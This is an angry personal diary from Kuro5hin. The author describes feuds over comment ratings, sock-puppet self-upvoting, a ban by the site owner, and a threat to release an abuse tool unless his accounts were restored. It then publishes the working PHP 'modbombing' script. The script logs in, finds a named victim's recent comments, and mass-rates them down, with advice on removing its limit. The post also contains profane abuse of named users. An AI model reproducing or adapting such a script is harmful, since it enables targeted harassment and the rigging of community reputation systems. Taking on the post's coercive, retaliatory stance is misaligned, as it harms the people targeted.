As if having my articles blasted away by sheep weren't bad enough,
every time I posted a comment I found a littany
of pretentious people voting me down to 1 or 0 just for trying to express my
opinion. They declared mod-war on me first. I fought back like a
man by voting them down and registering a second account to rate
myself back up, but I was only one voice
trying to speak out against a one-sided clique with cult mentality,
so of course they continued to destroy my mojo unchecked just like
certain idiots try to destroy
my karma on Slashdot with abuse.
After putting up with months of ratings abuse on Kuro5hin,
the shit finally hit the fan when you people started writing scripts
to do your censorship for you. Rather than deal with what I
had to say you wasted hours of your lives trying to silence me.
I wasn't going to take this shit from self-righteous fuckers, so
I acquired my own Scoop ratings script -- and a better one than
they had, too. You have to understand how I'm pissed off after
all this abuse, so I went through and made a list of everyone
who had rated me badly which included site owner Rusty, and I
used the script to hit them with 1s so they could see what it felt
So like a true BOFH, Rusty (who I'd always wanted to consider a friend
and a fellow webmaster) fucked with my Kuro5hin accounts to the point
where I can't use them, and when I tried to create new accounts
those got locked too. So basically I'm barred from K5 because people
attacked ME and I tried to defend myself somehow. I created this last account (which will probably get banned too) to tell my story and speak up for myself. I'm not posting this to get sympathy but to get one final chance to say fuck you.
I tried to find Rusty on IRC but he didn't give enough of a damn to
even talk to me so I talked to Hurstdog instead. I told Hurstdog
that if I didn't get to personally speak to Rusty about restoring
my accounts, I'd release the
modbombing script to the public and let the site go to hell
until Rusty fixes the broken ratings system. I heard through a third
party that you were "too busy" to address my complaint.
So here we are. I made my demands, and they weren't met. I always
thought Rusty was cool (although I have it on good authority that he
and a certain Slashdot editor were involved in the massive crapflooding
of my
site a few months back), and I'm sorry I used the script to vote
you down, but the way you reacted was a serious power-trip and
totally unfair; instead of fixing his broken website, he abused me,
the victim of it.
So, Rusty, fuck you. Hurstdog, fuck you. Everyone
who voted me down, especially Bobsquath, fuck you. Everyone else on this site
except for my friends who backed me up (you know who you are),
fuck you.
As if this weren't enough in my life, I'm being harassed on my website,
it's being hit again with more Olsen crapfloods. I've received
threatening and insulting anonymous e-mails from a Sneakemail address,
idiots are spreading my home phone number around the Internet, and in
short I'm being treated like shit by the entire world just
for being an individual. I'm nearly in tears over this and I've started
to question just what the point of it all is. To my friends, thanks for everything, and to anybody who hasn't
gotten the message yet,
fuck you.
This diary covers many of the things I covered in a GiZ post earlier
today, but it was written for a different audience so I added some
things and left out others. For those who want to see what I had
to say to my real friends,
read the post here (ignore the crapflood; I'm trying to clean it up.)
And now the moment you've all been waiting for...
You'll need the following PHP library files which you should be able to find anywhere, but e-mail
me if you can't.
PEAR.php PEAR2.php Socket.php http.php
Note: I modified this script to moderate only a user's 14 most
recent comments because beyond 14, comment ratings count very
little for mojo. If you want to modbomb all out, it's easy to
change it back.
require_once "http.php";
$browser = new Net_HTTP;
$offset = 0;
if (!$argv[1] || !$argv[2] || !$argv[3]) die("Please start as follows: php kuro5hite.php <victim> <account> <password> [score]");
$score = $argv[4] ? $argv[4] : 1;
define("SCORE", $score);
$victim = urldecode($argv[1]);
define("USER", urldecode($argv[2]));
define("PASSWORD", urldecode($argv[3]));
$browser->query("POST", "", array(uname => USER, pass => PASSWORD, login => "Login"));
$session = $browser->cookie["k5-new_session"];
//do {
$page = $browser->query("GET", "", array(op => "search", offset => $offset, old_count => 50, "next" => $next, "count" => "50", type => "comment_by", "string" => $victim), array(session => $session));
$pattern = '|<A HREF="/comments/(\d+/\d+/\d+/\d+/\d+)/(\d+)#\d+">[^<]*</A></B>|';
preg_match_all($pattern, $page, $matches);
for ($c = 0; $matches[1][$c]; $c++) {
$browser->query("POST", "", array(sid => $matches[1][$c], op => "comments", "pid" => 0, "rating_" . $matches[2][$c] => SCORE, rate => "Rate All"), array("k5-new_session" => $session));
if ($c > 13) break;
// if ($next) $offset += 50;
// $next = "Next Page >>";
//} while (strstr($page, '<INPUT TYPE="submit" NAME="next" VALUE="Next Page >>">'));